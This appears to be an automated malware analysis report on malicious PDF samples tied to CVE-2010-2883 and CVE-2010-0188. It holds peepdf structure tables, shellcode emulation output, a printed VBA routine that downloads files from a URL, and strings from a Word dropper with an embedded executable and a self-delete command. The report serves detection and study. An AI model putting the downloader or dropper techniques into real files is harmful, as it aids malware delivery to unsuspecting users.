**SHA1:** b76d94604bec599b023ce5936e2899e77c797017  
**MD5:** 0c1e79d71b93905ce6016c179e7e5a0b  
**PDF version:** 1.0  
**Filesize (in bytes):** 3503  
**Binary:** True  
**Number of objects:** 7  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 6, 8, 70000000 |  
| Catalog | 70000000 |  
| Streams | 1 |  
| Encoded streams | 1 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 70000000 |  
| /XFA | 8 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 46/59</b>: for CVE_2010-2883_PDF_83627FF5E21B8AD89224926CE9913110 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f.json)*   
  
**SHA256:** `ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f`  
**SHA1:** 8824c4dc70833cd892eef27d7abab1ed1643c9bb  
**MD5:** 83627ff5e21b8ad89224926ce9913110  
**PDF version:** 1.5  
**Filesize (in bytes):** 45802  
**Binary:** True  
**Number of objects:** 14  
**Number of streams:** 4  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 |  
| Catalog | 1 |  
| Streams | 8, 10, 12, 14 |  
| Encoded streams | 10 |  
| Error objects | 12 |  
| JavaScript objects | 12 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| CoolType.SING.uniqueName | 10<br> | CVE-2010-2883<br> | CoolType.SING.uniqueName |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 1 |  
| /OpenAction | 1 |  
| /XFA | 13 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 39/56</b>: for CVE-2010-0188_PDF_0C0D4B0B5D5C7CF353C949AFB49E3A66 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac.json)*   
  
**SHA256:** `d9866a9271fa689a4b1c3224a1b2da399d11d9f9f7b5d253124d944177fb99ac`  
**SHA1:** 2e931322cb74dba207a7d64f517e228d78cd9efa  
**MD5:** 0c0d4b0b5d5c7cf353c949afb49e3a66  
**PDF version:** 1.3  
**Filesize (in bytes):** 3497  
**Binary:** True  
**Number of objects:** 10  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 6, 7, 8, 9, 10, 11 |  
| Information | 2 |  
| Streams | 8 |  
| Encoded streams | 8 |  
| JavaScript objects | 11 |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /Names | 10 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 42/58</b>: for CVE-2010-0188_PDF_05CB1CB01D66A3B5BAB693377235E24F (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf.json)*   
  
**SHA256:** `acfaa984e72d62cca6948eba1d70aa5441bfbde7cd9b696d28f17067225b5faf`  
**SHA1:** 9c261ea92f3ded9ac9ecdcd84b14d5052e336256  
**MD5:** 05cb1cb01d66a3b5bab693377235e24f  
**PDF version:** 1.3  
**Filesize (in bytes):** 3497  
**Binary:** True  
**Number of objects:** 10  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 6, 7, 8, 9, 10, 11 |  
| Information | 2 |  
| Streams | 8 |  
| Encoded streams | 8 |  
| JavaScript objects | 11 |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /Names | 10 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 40/58</b>: for CVE-2010-0188_PDF_05C415D57E92F43578D8DEA73932068B (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6.json)*   
  
**SHA256:** `f492374f04bdee33045b43cad57a301cf22e1ca03cdd2c3e90fd3dbdb8cb38a6`  
**SHA1:** 18e2712cb167fbd48043b55082e2194e1c119be3  
**MD5:** 05c415d57e92f43578d8dea73932068b  
**PDF version:** 1.3  
**Filesize (in bytes):** 3499  
**Binary:** True  
**Number of objects:** 10  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 6, 7, 8, 9, 10, 11 |  
| Information | 2 |  
| Streams | 8 |  
| Encoded streams | 8 |  
| JavaScript objects | 11 |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /Names | 10 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 44/59</b>: for CVE_2010-2883_PDF_AF6B71B2BA0E9DC903DC2CE677FFB5ED (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc.json)*   
  
**SHA256:** `bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc`  
**SHA1:** c9495ecd3f29e7ab89147cefefeafb826373fc26  
**MD5:** af6b71b2ba0e9dc903dc2ce677ffb5ed  
**PDF version:** 1.5  
**Filesize (in bytes):** 45460  
**Binary:** True  
**Number of objects:** 14  
**Number of streams:** 4  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 |  
| Catalog | 1 |  
| Streams | 8, 10, 12, 14 |  
| Encoded streams | 10, 12 |  
| JavaScript objects | 12 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| CoolType.SING.uniqueName | 10<br> | CVE-2010-2883<br> | CoolType.SING.uniqueName |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 1 |  
| /OpenAction | 1 |  
| /XFA | 13 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 38/59</b>: for CVE-2010-0188_PDF_0BE85FEC3D98D70F1FB6D08CCEF7FD65 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46.json)*   
  
**SHA256:** `41535d04a97c2df7c124d4ca357c1867318cf1852edb2c5dd0600ea42d3bba46`  
**SHA1:** c08fdc52cf58ae62b9ea1969a2aae86de7bf3edd  
**MD5:** 0be85fec3d98d70f1fb6d08ccef7fd65  
**PDF version:** 1.5  
**Filesize (in bytes):** 2688  
**Binary:** True  
**Number of objects:** 8  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8 |  
| Catalog | 7 |  
| Streams | 1 |  
| Encoded streams | 1 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| /EmbeddedFile | 1<br> |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 7 |  
| /XFA | 8 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 43/58</b>: for CVE-2010-0188_PDF_06D8AFC570BA0ACDC1AFE5B2FCC06CB1 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d.json)*   
  
**SHA256:** `a9e1e95822b3f3fb6d10a1704391f3a8fab33c178f41d61bf717fa6f01b5085d`  
**SHA1:** f56a66d8008639f677c2b9fd0a9609d4b9e8eb67  
**MD5:** 06d8afc570ba0acdc1afe5b2fcc06cb1  
**PDF version:** 1.3  
**Filesize (in bytes):** 3393  
**Binary:** True  
**Number of objects:** 10  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 6, 7, 8, 9, 10, 11 |  
| Information | 2 |  
| Streams | 8 |  
| Encoded streams | 8 |  
| JavaScript objects | 11 |  
  
**Actions**  
  
| Action name | Object number |  
|:---:|:---:|  
| /JS | 11 |  
| /JavaScript | 11 |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /Names | 10 |  
  
  
</details>  

---
  
<details>  
<summary><b>Detection 40/59</b>: for CVE-2010-0188_PDF_6AC220194E8B53C70CFACD6D3ED1F455 (Click to collapse.)</summary>  
  

---
  
*Original result JSON can be found from [here](results/json-output/peepdf/peepdf_c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5.json)*   
  
**SHA256:** `c2c62941d0f524fc1eaeba649e8c8349d1492c81fcbf24680439beb127ffd7f5`  
**SHA1:** 7cbbc21f4dc45a9b296489bf739aabcf048f3d69  
**MD5:** 6ac220194e8b53c70cfacd6d3ed1f455  
**PDF version:** 1.5  
**Filesize (in bytes):** 2696  
**Binary:** True  
**Number of objects:** 8  
**Number of streams:** 1  
**Encrypted:** True  
**Linearized:** True  
**Comments:** 0  
  
#### File structure  
  
##### Original file  
  
| Object type | Object numbers (Not amount!) |  
|:---:|:---:|  
| All objects | 1, 2, 3, 4, 5, 6, 7, 8 |  
| Catalog | 7 |  
| Streams | 1 |  
| Encoded streams | 1 |  
  
**Suspicious elements**  
  
| Element name | Object number |  
|:---:|:---:|  
| /EmbeddedFile | 1<br> |  
  
**Triggers**  
  
| Trigger name | Object number |  
|:---:|:---:|  
| /AcroForm | 7 |  
| /XFA | 8 |  
  
  
</details>  
  
## Jsunpack-n and peepdf&#x27;s sctest analysis section  
This section is attempting to show possible embedded shellcode/JavaScript from malware files. Tool &#x27;jsunpack-n&#x27; is used for extracting the exploit from the malware, and peepdf&#x27;s feature &#x27;sctest&#x27; attempts to convert it (usually from shellcode) for higher level language to be more readable.  
  
See more about jsunpack-n in [here.](https://github.com/urule99/jsunpack-n)  
See more about peepdf in [here.](https://github.com/jesparza/peepdf)  

---
  
<details>  
<summary><b>Shellcode analysis </b> for `bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc`  
Following code sections were found from document, they are not ordered in any way and might contain duplicates.  
  
Original shellcode can be found from path [results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/original_c9495ecd3f29e7ab89147cefefeafb826373fc26](results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/original_c9495ecd3f29e7ab89147cefefeafb826373fc26)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/decoding_cdc402f2235beae86babe3f36359d3188c04c3a9](results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/decoding_cdc402f2235beae86babe3f36359d3188c04c3a9)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/shellcode_19235b75b3bc2b5a8aec66fba03e63f80edd2532](results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/shellcode_19235b75b3bc2b5a8aec66fba03e63f80edd2532)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/decoding_7a64d139572f1ed5baa0b3c3f503a58a8deabc2c](results/shellcode/bb6f26f2a8b57f7ba3d465d9187fd7c3aaa7d40d9292352dadd82657307a14bc/decoding_7a64d139572f1ed5baa0b3c3f503a58a8deabc2c)  
```None
[0m
```  
  
</details>  

---
  
<details>  
<summary><b>Shellcode analysis </b> for `2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415`  
Following code sections were found from document, they are not ordered in any way and might contain duplicates.  
  
Original shellcode can be found from path [results/shellcode/2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415/decoding_d0d4971d4876015d9876c351ff1e57033452e408](results/shellcode/2a11477962ddf24b09f3039cde215e2d573e167a816e58de7431091de1c95415/decoding_d0d4971d4876015d9876c351ff1e57033452e408)  
```None
[0m
```  
  
</details>  

---
  
<details>  
<summary><b>Shellcode analysis </b> for `38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e`  
Following code sections were found from document, they are not ordered in any way and might contain duplicates.  
  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_f8021fb4f56cd236211d8947b0ad12ea02bbbd52](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_f8021fb4f56cd236211d8947b0ad12ea02bbbd52)  
```None

HMODULE LoadLibraryA (
     LPCTSTR = 0x02bc2fc0 => 
           = "wininet";
) =  0x3d930000;

[0m
```  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/decoding_acdd2685133b2c30333f58c9fb75b272d022a5f9](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/decoding_acdd2685133b2c30333f58c9fb75b272d022a5f9)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/decoding_6c90c5e1aa631afccd8978001f2f06f296309788](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/decoding_6c90c5e1aa631afccd8978001f2f06f296309788)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/original_17acd4de827e726c727c0c8cc9c4e872a328ee6c](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/original_17acd4de827e726c727c0c8cc9c4e872a328ee6c)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_c198cf9681a0fbbc2add5c44a689839ccd0a3f76](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_c198cf9681a0fbbc2add5c44a689839ccd0a3f76)  
```None

HMODULE LoadLibraryA (
     LPCTSTR = 0x01eaef40 => 
           = "wininet";
) =  0x3d930000;

[0m
```  
Original shellcode can be found from path [results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_fe4628c73fc14f341e1b6906d2632f5280eb81bb](results/shellcode/38307e7fa6344a35c69236d71a871a1d0e7bd4d091019b6fc62243469a3d538e/shellcode_fe4628c73fc14f341e1b6906d2632f5280eb81bb)  
```None

HMODULE LoadLibraryA (
     LPCTSTR = 0x0102beb0 => 
           = "wininet";
) =  0x3d930000;

[0m
```  
  
</details>  

---
  
<details>  
<summary><b>Shellcode analysis </b> for `ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f`  
Following code sections were found from document, they are not ordered in any way and might contain duplicates.  
  
Original shellcode can be found from path [results/shellcode/ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f/decoding_7f90faa31621e7e7590bc3310549053630f57926](results/shellcode/ffc927d004555dd87553cf3d943a7c29a6533d4ad6ba6c0e25f1ce8c8640e19f/decoding_7f90faa31621e7e7590bc3310549053630f57926)  
```None
[0m
```  
  
</details>  

---
  
<details>  
<summary><b>Shellcode analysis </b> for `67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac`  
Following code sections were found from document, they are not ordered in any way and might contain duplicates.  
  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_c9b28de86936a78450146e85882d78e1f9129391](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_c9b28de86936a78450146e85882d78e1f9129391)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_477757562cf82b3fb23a74737fc2225561c98666](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_477757562cf82b3fb23a74737fc2225561c98666)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_fdbd1dd93267a22109dc2e431104e88b206fab67](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_fdbd1dd93267a22109dc2e431104e88b206fab67)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/decoding_a525a8f5af521108d8cf86cd38f9c43de93bcbd7](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/decoding_a525a8f5af521108d8cf86cd38f9c43de93bcbd7)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_a446fa4cd8eaad6959803a9a6371fcf67ca5952d](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_a446fa4cd8eaad6959803a9a6371fcf67ca5952d)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_35be59401aa7097fc1427b726fa44d3cf67ce738](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_35be59401aa7097fc1427b726fa44d3cf67ce738)  
```None

UINT WINAPI WinExec (
     LPCSTR = 0x02a41060 => 
           = "calc.exe";
     UINT uCmdShow = 1;
) =  0x20;
DWORD WINAPI GetVersion (
) =  0xa280105;
void ExitProcess (
     UINT uExitCode = 0;
) =  0x0;

[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/original_adc2da1ee93f9708f92a86bfd03ea01c8d2befa9](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/original_adc2da1ee93f9708f92a86bfd03ea01c8d2befa9)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/decoding_4586aad13942207150c8d6c5e72a171c3f3e0156](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/decoding_4586aad13942207150c8d6c5e72a171c3f3e0156)  
```None
[0m
```  
Original shellcode can be found from path [results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_e6527ed9bc8666f09049310102f7677605d4feb1](results/shellcode/67025c35e17abdfca89b65efd0a47ba6d3fb628275f47e641775889c5236bdac/shellcode_e6527ed9bc8666f09049310102f7677605d4feb1)  
```None

UINT WINAPI WinExec (
     LPCSTR = 0x0213b830 => 
           = "calc.exe";
     UINT uCmdShow = 1;
) =  0x20;
DWORD WINAPI GetVersion (
) =  0xa280105;
void ExitProcess (
     UINT uExitCode = 0;
) =  0x0;

[0m
```  
  
</details>  
  
## Strings analysis data  
This section contain strings or references to strings which are extracted from the sample files. It is not used for PDF files.  

---
  
<details>  
<summary><b>Strings for e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (tee.txt)</b> (Click to collapse.)</summary>  
  

---
  
Original strings result JSON can be found from [here.](results/json-output/strings/strings_e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855.json)  
```None

```  
  
</details>  

---
  
<details>  
<summary><b>Strings for a7fc11b5bcd8f0f4bd58d1b003202c2c92193adcf8f42fa30873cac92ba15cb9 (testi.bas)</b> (Click to collapse.)</summary>  
  

---
  
Original strings result JSON can be found from [here.](results/json-output/strings/strings_a7fc11b5bcd8f0f4bd58d1b003202c2c92193adcf8f42fa30873cac92ba15cb9.json)  
```None
#FROM https://analystcave.com/excel-downloading-files-using-vba/
Private Const INTERNET_FLAG_NO_CACHE_WRITE = &H4000000
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" (ByVal lpszAgent As String, ByVal dwAccessType As Long, ByVal lpszProxyName As String, ByVal lpszProxyBypass As String, ByVal dwFlags As Long) As Long
Private Declare Function InternetReadBinaryFile Lib "wininet.dll" Alias "InternetReadFile" (ByVal hfile As Long, ByRef bytearray_firstelement As Byte, ByVal lNumBytesToRead As Long, ByRef lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal sUrl As String, ByVal sHeaders As String, ByVal lHeadersLength As Long, ByVal lFlags As Long, ByVal lContext As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet.dll" (ByVal hInet As Long) As Integer
Sub DownloadFile(sUrl As String, filePath As String, Optional overWriteFile As Boolean)
  Dim hInternet, hSession, lngDataReturned As Long, sBuffer() As Byte, totalRead As Long
  Const bufSize = 128
  ReDim sBuffer(bufSize)
  hSession = InternetOpen("", 0, vbNullString, vbNullString, 0)
  If hSession Then hInternet = InternetOpenUrl(hSession, sUrl, vbNullString, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0)
  Set oStream = CreateObject("ADODB.Stream")
  oStream.Open
  oStream.Type = 1
  If hInternet Then
    iReadFileResult = InternetReadBinaryFile(hInternet, sBuffer(0), UBound(sBuffer) - LBound(sBuffer), lngDataReturned)
    ReDim Preserve sBuffer(lngDataReturned - 1)
    oStream.Write sBuffer
    ReDim sBuffer(bufSize)
    totalRead = totalRead + lngDataReturned
    Application.StatusBar = "Downloading file. " & CLng(totalRead / 1024) & " KB downloaded"
    DoEvents
    Do While lngDataReturned <> 0
      iReadFileResult = InternetReadBinaryFile(hInternet, sBuffer(0), UBound(sBuffer) - LBound(sBuffer), lngDataReturned)
      If lngDataReturned = 0 Then Exit Do
      ReDim Preserve sBuffer(lngDataReturned - 1)
      oStream.Write sBuffer
      ReDim sBuffer(bufSize)
      totalRead = totalRead + lngDataReturned
      Application.StatusBar = "Downloading file. " & CLng(totalRead / 1024) & " KB downloaded"
      DoEvents
    Loop
    Application.StatusBar = "Download complete"
    oStream.SaveToFile filePath, IIf(overWriteFile, 2, 1)
    oStream.Close
  End If
  Call InternetCloseHandle(hInternet)
End Sub
```  
  
</details>  

---
  
<details>  
<summary><b>Strings for f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71 (Round_Table_Discussions.doc)</b> (Click to collapse.)</summary>  
  

---
  
Original strings result JSON can be found from [here.](results/json-output/strings/strings_f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71.json)  
```None
bjbj
2C1:
W[SO
[IN;
 & 6"
      
Normal.dot
      
Microsoft Word 11.0
VRHEIKER       
FVCL
c:\winmsio.exe
Microsoft Word 
MSWordDoc
Word.Document.8
!This program cannot be run in DOS mode.
xZS`
hK	T`
	RichS`
.text
`.rdata
@.data
.rsrc
@.test
40^-
=P @
L$8h 0@
_][^
D$Xh
Qh<0@
T$Xh
D$\RP
h,0@
D$$D
5  @
T$Xh
SUVW
L$ UQ
T$Hh
L$HEh
hD0@
_^][
D$Hh
L$HEh
_^][
SUVW3
|$Eh
L$DQh
SSPh
_^][d
%\ @
%0 @
%h @
%l @
%p @
%t @
%x @
%| @
%d @
h !@
 SVW
Process32Next
CloseHandle
OpenProcess
TerminateProcess
Process32First
CreateToolhelp32Snapshot
ResumeThread
SetFileAttributesA
SetPriorityClass
GetCurrentProcess
GetLastError
CreateProcessA
GetShortPathNameA
GetEnvironmentVariableA
GetModuleFileNameA
WinExec
GetTempPathA
GetModuleHandleA
GetCommandLineA
KERNEL32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
MFC42.DLL
sprintf
strstr
__CxxFrameHandler
__dllonexit
_onexit
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
MSVCP60.dll
_stricmp
winword.exe
%s /c del %s
COMSPEC
11.0
Software\Microsoft\Office\11.0\word\Resiliency
open
test.doc
WINWORD.exe
Fatal Error: MFC initialization failed
E"O"
E"O"
Cs3011FS2011
Cs7311FS6311=e
CK2011
CK6311
CK2011
CC6311m
111M
E"M"
&9011
2%>1
E"O"
Cs7311F[6311=e
Cs?511F[>511=e
Cs;211F[:211=e
Cs3011F[2011=e
edwO
Cs'711F[&711=e
edCK6311
CK6311
CK>511
211CK6311
CK:211
CK:211
CK6311
CK2011
CK2011
CK6311
CK&711
CK&711
CK>511
CK&711
CK&711
CK:211u&
&@311
&;211M
CK:211q
CK&711
011CK2011
311CK2011
&d311M
CK:211
CK2011
E"O"
E6CK
CK2011
1{.011&C111
E"O"
CC2011
111CK2011
311M
111	
E"M"
011K
E"O"
CKf011
CKf011
CKf011
CKn211
CKj311
CKf011
CKj311
CKj311
CKj311
CKn211
~=eC
CKn211
E"O"
Nk6011
Cs7011=eM
edCK6011
811CK6011p
111E6M
211M
011M
E"O"
CK2011
CK2011
CK2011
*&(:11M
1111
rrqqqquuuu
}}}}sl
]]]]}}}}}}}!eeeeuuuu%%%%%eeeuuuueeeaaaaaaaaeeeeeeeee
/{{{
-Y<D0000
Jxxx
QQQQ
w^^^
sgUUU
^V<<m=
s#cc
777n
rgk9yy
>`;OF
(%%%%%
{>~~
V"%u
WWRRR
]mmm
1a2XZ
b2a2a6e6
[Wn3
a`3`
Rttt
)x88
>n..
mCCC
."###p&q
HLh@!aa
@wYYY
wW6vv&
t44c
///v
t$QR
}PPP	
`B*:[
kFFF
111h
@AAA
$			P
SSSS
ugccc
\\]]]
MMMM
"s33j:
Qzzz#
@aaa8
Uu'ggh
@kkk
|WWW
VVVVV
sXXX	a-)))
fMMM
,,,,
%%%[Kvvvff
)<x)iif
|i-|<<
~bHHH
cv>o//
>vrrr
2njjj
gddd
#;QP
h $$$s
W==j
v/Z^m
$QUf
@"bb5
ocfqppp
gfff
jPRRR:
wK-mmh
>V*H
3FcZ
eE1#
,---
KJJJ
 """
5	o//*
ySRRR
rN(hh
wvvv
))))A
g''p
iLu0 Jj
U ,)
